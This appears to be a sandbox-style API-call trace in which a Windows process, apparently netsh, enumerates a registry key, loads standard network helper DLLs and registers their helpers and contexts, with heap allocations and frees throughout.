[0163.772] GetProcessHeap () returned 0x2b0000 [0163.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2f3be0 [0163.772] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0163.772] GetProcessHeap () returned 0x2b0000 [0163.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eef40 | out: hHeap=0x2b0000) returned 1 [0163.772] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef4c30000 [0168.061] GetProcAddress (hModule=0x7fef4c30000, lpProcName="InitHelperDll") returned 0x7fef4c4048c [0168.061] InitHelperDll () returned 0x0 [0168.061] RegisterHelper () returned 0x0 [0168.062] GetProcessHeap () returned 0x2b0000 [0168.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb58) returned 0x2f5fd0 [0168.062] GetProcessHeap () returned 0x2b0000 [0168.062] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fd0 | out: hHeap=0x2b0000) returned 1 [0168.062] RegisterHelper () returned 0x0 [0168.062] GetProcessHeap () returned 0x2b0000 [0168.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbb0) returned 0x2f6b30 [0168.062] GetProcessHeap () returned 0x2b0000 [0168.062] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5fd0 | out: hHeap=0x2b0000) returned 1 [0168.062] RegisterHelper () returned 0x0 [0168.062] GetProcessHeap () returned 0x2b0000 [0168.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc08) returned 0x2f76f0 [0168.063] GetProcessHeap () returned 0x2b0000 [0168.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f6b30 | out: hHeap=0x2b0000) returned 1 [0168.063] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="nshipsec", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0168.063] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0168.063] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0168.063] GetProcessHeap () returned 0x2b0000 [0168.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x280) returned 0x2f2ec0 [0168.063] GetProcessHeap () returned 0x2b0000 [0168.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ee530 [0168.063] GetProcessHeap () returned 0x2b0000 [0168.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2f2ab0 [0168.063] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0168.063] GetProcessHeap () returned 0x2b0000 [0168.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5ae0 | out: hHeap=0x2b0000) returned 1 [0168.063] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef3000000 [0174.338] GetProcAddress (hModule=0x7fef3000000, lpProcName="InitHelperDll") returned 0x7fef3006230 [0174.338] InitHelperDll () returned 0x0 [0174.338] RegisterHelper () returned 0x0 [0174.338] GetProcessHeap () returned 0x2b0000 [0174.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc60) returned 0x2fcd30 [0174.338] GetProcessHeap () returned 0x2b0000 [0174.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f76f0 | out: hHeap=0x2b0000) returned 1 [0174.338] RegisterHelper () returned 0x0 [0174.338] GetProcessHeap () returned 0x2b0000 [0174.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xcb8) returned 0x2f6fd0 [0174.339] GetProcessHeap () returned 0x2b0000 [0174.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fcd30 | out: hHeap=0x2b0000) returned 1 [0174.339] RegisterHelper () returned 0x0 [0174.339] GetProcessHeap () returned 0x2b0000 [0174.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd10) returned 0x2fcd30 [0174.339] GetProcessHeap () returned 0x2b0000 [0174.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f6fd0 | out: hHeap=0x2b0000) returned 1 [0174.502] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="nettrace", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0174.502] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0174.502] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0174.502] GetProcessHeap () returned 0x2b0000 [0174.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2a8) returned 0x2f6fd0 [0174.502] GetProcessHeap () returned 0x2b0000 [0174.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ee710 [0174.502] GetProcessHeap () returned 0x2b0000 [0174.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2f5510 [0174.502] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0174.502] GetProcessHeap () returned 0x2b0000 [0174.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2ec0 | out: hHeap=0x2b0000) returned 1 [0174.503] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef2bc0000 [0177.515] GetProcAddress (hModule=0x7fef2bc0000, lpProcName="InitHelperDll") returned 0x7fef2c07360 [0177.515] InitHelperDll () returned 0x0 [0177.515] RegisterHelper () returned 0x0 [0177.515] GetProcessHeap () returned 0x2b0000 [0177.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd68) returned 0x302610 [0177.515] GetProcessHeap () returned 0x2b0000 [0177.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fcd30 | out: hHeap=0x2b0000) returned 1 [0177.515] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="WcnNetsh", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0177.515] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0177.515] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0177.515] GetProcessHeap () returned 0x2b0000 [0177.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2d0) returned 0x303380 [0177.515] GetProcessHeap () returned 0x2b0000 [0177.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ee610 [0177.515] GetProcessHeap () returned 0x2b0000 [0177.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x302310 [0177.516] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0177.516] GetProcessHeap () returned 0x2b0000 [0177.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f6fd0 | out: hHeap=0x2b0000) returned 1 [0177.516] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef2990000 [0179.093] GetProcAddress (hModule=0x7fef2990000, lpProcName="InitHelperDll") returned 0x7fef29928e4 [0179.093] InitHelperDll () returned 0x0 [0179.093] RegisterHelper () returned 0x0 [0179.093] GetProcessHeap () returned 0x2b0000 [0179.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xdc0) returned 0x304e60 [0179.094] GetProcessHeap () returned 0x2b0000 [0179.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x302610 | out: hHeap=0x2b0000) returned 1 [0179.094] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="p2pnetsh", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0179.094] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0179.094] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0179.094] GetProcessHeap () returned 0x2b0000 [0179.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2f8) returned 0x2f6fd0 [0179.094] GetProcessHeap () returned 0x2b0000 [0179.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ee630 [0179.094] GetProcessHeap () returned 0x2b0000 [0179.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x303960 [0179.094] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0179.095] GetProcessHeap () returned 0x2b0000 [0179.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x303380 | out: hHeap=0x2b0000) returned 1 [0179.095] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef2960000 [0188.937] GetProcAddress (hModule=0x7fef2960000, lpProcName="InitHelperDll") returned 0x7fef2965568 [0188.937] InitHelperDll () returned 0x0 [0188.937] RegisterHelper () returned 0x0 [0188.937] GetProcessHeap () returned 0x2b0000 [0188.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe18) returned 0x30ae50 [0188.937] GetProcessHeap () returned 0x2b0000 [0188.937] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x304e60 | out: hHeap=0x2b0000) returned 1 [0188.937] RegisterHelper () returned 0x0 [0188.937] GetProcessHeap () returned 0x2b0000 [0188.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe70) returned 0x30bc70 [0188.938] GetProcessHeap () returned 0x2b0000 [0188.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30ae50 | out: hHeap=0x2b0000) returned 1 [0188.938] RegisterHelper () returned 0x0 [0188.938] GetProcessHeap () returned 0x2b0000 [0188.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xec8) returned 0x30caf0 [0188.938] GetProcessHeap () returned 0x2b0000 [0188.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30bc70 | out: hHeap=0x2b0000) returned 1 [0188.938] RegisterHelper () returned 0x0 [0188.938] GetProcessHeap () returned 0x2b0000 [0188.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf20) returned 0x30ae50 [0188.938] GetProcessHeap () returned 0x2b0000 [0188.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30caf0 | out: hHeap=0x2b0000) returned 1 [0188.938] RegisterHelper () returned 0x0 [0188.938] GetProcessHeap () returned 0x2b0000 [0188.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf78) returned 0x30bd80 [0188.938] GetProcessHeap () returned 0x2b0000 [0188.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30ae50 | out: hHeap=0x2b0000) returned 1 [0188.939] RegisterHelper () returned 0x0 [0188.939] GetProcessHeap () returned 0x2b0000 [0188.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xfd0) returned 0x30cd00 [0188.939] GetProcessHeap () returned 0x2b0000 [0188.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30bd80 | out: hHeap=0x2b0000) returned 1 [0188.939] RegisterHelper () returned 0x0 [0188.939] GetProcessHeap () returned 0x2b0000 [0188.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1028) returned 0x30ae50 [0188.939] GetProcessHeap () returned 0x2b0000 [0188.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30cd00 | out: hHeap=0x2b0000) returned 1 [0188.939] RegisterHelper () returned 0x0 [0188.939] GetProcessHeap () returned 0x2b0000 [0188.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1080) returned 0x30be80 [0188.939] GetProcessHeap () returned 0x2b0000 [0188.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30ae50 | out: hHeap=0x2b0000) returned 1 [0188.939] RegisterHelper () returned 0x0 [0188.939] GetProcessHeap () returned 0x2b0000 [0188.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10d8) returned 0x30cf10 [0188.940] GetProcessHeap () returned 0x2b0000 [0188.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30be80 | out: hHeap=0x2b0000) returned 1 [0188.940] RegisterHelper () returned 0x0 [0188.940] GetProcessHeap () returned 0x2b0000 [0188.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1130) returned 0x30dff0 [0188.940] GetProcessHeap () returned 0x2b0000 [0188.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30cf10 | out: hHeap=0x2b0000) returned 1 [0188.940] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="wwancfg", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0188.940] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0188.940] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0188.940] GetProcessHeap () returned 0x2b0000 [0188.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x320) returned 0x2fd140 [0188.940] GetProcessHeap () returned 0x2b0000 [0188.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2ee690 [0188.940] GetProcessHeap () returned 0x2b0000 [0188.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2ee670 [0188.940] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0188.940] GetProcessHeap () returned 0x2b0000 [0188.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f6fd0 | out: hHeap=0x2b0000) returned 1 [0188.941] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef2830000 [0190.307] GetProcAddress (hModule=0x7fef2830000, lpProcName="InitHelperDll") returned 0x7fef28320c8 [0190.307] InitHelperDll () returned 0x0 [0190.307] RegisterHelper () returned 0x0 [0190.307] GetProcessHeap () returned 0x2b0000 [0190.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1188) returned 0x30ae50 [0190.308] GetProcessHeap () returned 0x2b0000 [0190.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30dff0 | out: hHeap=0x2b0000) returned 1 [0190.308] RegEnumValueW (in: hKey=0x90, dwIndex=0x13, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="wlancfg", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0190.308] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0190.308] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0190.308] GetProcessHeap () returned 0x2b0000 [0190.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x348) returned 0x304e60 [0190.308] GetProcessHeap () returned 0x2b0000 [0190.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f7970 [0190.308] GetProcessHeap () returned 0x2b0000 [0190.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2f79b0 [0190.308] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0190.308] GetProcessHeap () returned 0x2b0000 [0190.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fd140 | out: hHeap=0x2b0000) returned 1 [0190.308] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef2800000 [0191.328] GetProcAddress (hModule=0x7fef2800000, lpProcName="InitHelperDll") returned 0x7fef280613c [0191.328] InitHelperDll () returned 0x0 [0191.328] RegisterHelper () returned 0x0 [0191.328] GetProcessHeap () returned 0x2b0000 [0191.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e0) returned 0x30cfe0 [0191.328] GetProcessHeap () returned 0x2b0000 [0191.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30ae50 | out: hHeap=0x2b0000) returned 1 [0191.328] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="peerdistsh", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0191.328] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0191.328] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0191.328] GetProcessHeap () returned 0x2b0000 [0191.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x370) returned 0x3051b0 [0191.328] GetProcessHeap () returned 0x2b0000 [0191.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x16) returned 0x2f79d0 [0191.328] GetProcessHeap () returned 0x2b0000 [0191.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x302fa0 [0191.328] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0191.328] GetProcessHeap () returned 0x2b0000 [0191.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x304e60 | out: hHeap=0x2b0000) returned 1 [0191.328] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef2710000 [0192.148] GetProcAddress (hModule=0x7fef2710000, lpProcName="InitHelperDll") returned 0x7fef278e69c [0192.148] InitHelperDll () returned 0x0 [0192.210] RegisterHelper () returned 0x0 [0192.210] GetProcessHeap () returned 0x2b0000 [0192.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1238) returned 0x30e1d0 [0192.210] GetProcessHeap () returned 0x2b0000 [0192.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30cfe0 | out: hHeap=0x2b0000) returned 1 [0192.210] RegisterHelper () returned 0x0 [0192.210] GetProcessHeap () returned 0x2b0000 [0192.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1290) returned 0x30f410 [0192.210] GetProcessHeap () returned 0x2b0000 [0192.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30e1d0 | out: hHeap=0x2b0000) returned 1 [0192.210] RegCloseKey (hKey=0x90) returned 0x0 [0192.211] GetProcessHeap () returned 0x2b0000 [0192.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2310 | out: hHeap=0x2b0000) returned 1 [0192.211] GetProcessHeap () returned 0x2b0000 [0192.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ce060 | out: hHeap=0x2b0000) returned 1 [0192.212] GetProcessHeap () returned 0x2b0000 [0192.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc000 [0192.212] GetProcessHeap () returned 0x2b0000 [0192.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0192.212] RegisterContext () returned 0x0 [0192.214] GetProcessHeap () returned 0x2b0000 [0192.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc080 [0192.214] GetProcessHeap () returned 0x2b0000 [0192.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0192.234] RegisterContext () returned 0x0 [0192.235] GetProcessHeap () returned 0x2b0000 [0192.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc100 [0192.235] GetProcessHeap () returned 0x2b0000 [0192.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0192.235] RegisterContext () returned 0x0 [0192.235] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0192.235] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0192.236] GetProcessHeap () returned 0x2b0000 [0192.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fa4d0 [0192.236] GetProcessHeap () returned 0x2b0000 [0192.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc100 | out: hHeap=0x2b0000) returned 1 [0192.236] RegisterContext () returned 0x0 [0192.236] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0192.237] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0192.237] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0192.237] GetProcessHeap () returned 0x2b0000 [0192.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x150) returned 0x2fd880 [0192.237] GetProcessHeap () returned 0x2b0000 [0192.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa4d0 | out: hHeap=0x2b0000) returned 1 [0192.237] RegisterContext () returned 0x0 [0192.238] GetProcessHeap () returned 0x2b0000 [0192.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c0) returned 0x30b090 [0192.238] GetProcessHeap () returned 0x2b0000 [0192.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fd880 | out: hHeap=0x2b0000) returned 1 [0192.238] RegisterContext () returned 0x0 [0192.238] GetProcessHeap () returned 0x2b0000 [0192.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fa4d0 [0192.238] GetProcessHeap () returned 0x2b0000 [0192.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc080 | out: hHeap=0x2b0000) returned 1 [0192.238] RegisterContext () returned 0x0 [0192.238] GetProcessHeap () returned 0x2b0000 [0192.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x150) returned 0x2fd880 [0192.238] GetProcessHeap () returned 0x2b0000 [0192.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa4d0 | out: hHeap=0x2b0000) returned 1 [0192.238] RegisterContext () returned 0x0 [0192.238] GetProcessHeap () returned 0x2b0000 [0192.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c0) returned 0x30b4e0 [0192.239] GetProcessHeap () returned 0x2b0000 [0192.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fd880 | out: hHeap=0x2b0000) returned 1 [0192.239] RegisterContext () returned 0x0 [0192.239] GetProcessHeap () returned 0x2b0000 [0192.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x230) returned 0x30b6b0 [0192.239] GetProcessHeap () returned 0x2b0000 [0192.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b4e0 | out: hHeap=0x2b0000) returned 1 [0192.247] RegisterContext () returned 0x0 [0192.247] GetProcessHeap () returned 0x2b0000 [0192.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2a0) returned 0x30b8f0 [0192.247] GetProcessHeap () returned 0x2b0000 [0192.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b6b0 | out: hHeap=0x2b0000) returned 1 [0192.248] RegisterContext () returned 0x0 [0192.248] GetProcessHeap () returned 0x2b0000 [0192.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x310) returned 0x30b4e0 [0192.254] GetProcessHeap () returned 0x2b0000 [0192.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b8f0 | out: hHeap=0x2b0000) returned 1 [0192.254] RegisterContext () returned 0x0 [0192.254] GetProcessHeap () returned 0x2b0000 [0192.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc080 [0192.264] GetProcessHeap () returned 0x2b0000 [0192.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0192.264] RegisterContext () returned 0x0 [0192.272] GetProcessHeap () returned 0x2b0000 [0192.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fa4d0 [0192.272] GetProcessHeap () returned 0x2b0000 [0192.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc080 | out: hHeap=0x2b0000) returned 1 [0192.272] RegisterContext () returned 0x0 [0192.273] GetProcessHeap () returned 0x2b0000 [0192.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x150) returned 0x2fd880 [0192.273] GetProcessHeap () returned 0x2b0000 [0192.273] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa4d0 | out: hHeap=0x2b0000) returned 1 [0192.273] RegisterContext () returned 0x0 [0192.273] GetProcessHeap () returned 0x2b0000 [0192.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c0) returned 0x30b800 [0192.273] GetProcessHeap () returned 0x2b0000 [0192.273] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fd880 | out: hHeap=0x2b0000) returned 1 [0192.273] RegisterContext () returned 0x0 [0192.273] GetProcessHeap () returned 0x2b0000 [0192.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x380) returned 0x30b9d0 [0192.273] GetProcessHeap () returned 0x2b0000 [0192.273] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b4e0 | out: hHeap=0x2b0000) returned 1 [0192.273] RegisterContext () returned 0x0 [0192.273] GetProcessHeap () returned 0x2b0000 [0192.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3f0) returned 0x316340 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b9d0 | out: hHeap=0x2b0000) returned 1 [0192.274] RegisterContext () returned 0x0 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x460) returned 0x30b9d0 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x316340 | out: hHeap=0x2b0000) returned 1 [0192.274] RegisterContext () returned 0x0 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4d0) returned 0x316340 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b9d0 | out: hHeap=0x2b0000) returned 1 [0192.274] RegisterContext () returned 0x0 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc080 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0192.274] RegisterContext () returned 0x0 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fa4d0 [0192.274] GetProcessHeap () returned 0x2b0000 [0192.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc080 | out: hHeap=0x2b0000) returned 1 [0192.275] RegisterContext () returned 0x0 [0192.275] GetProcessHeap () returned 0x2b0000 [0192.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x150) returned 0x2fd880 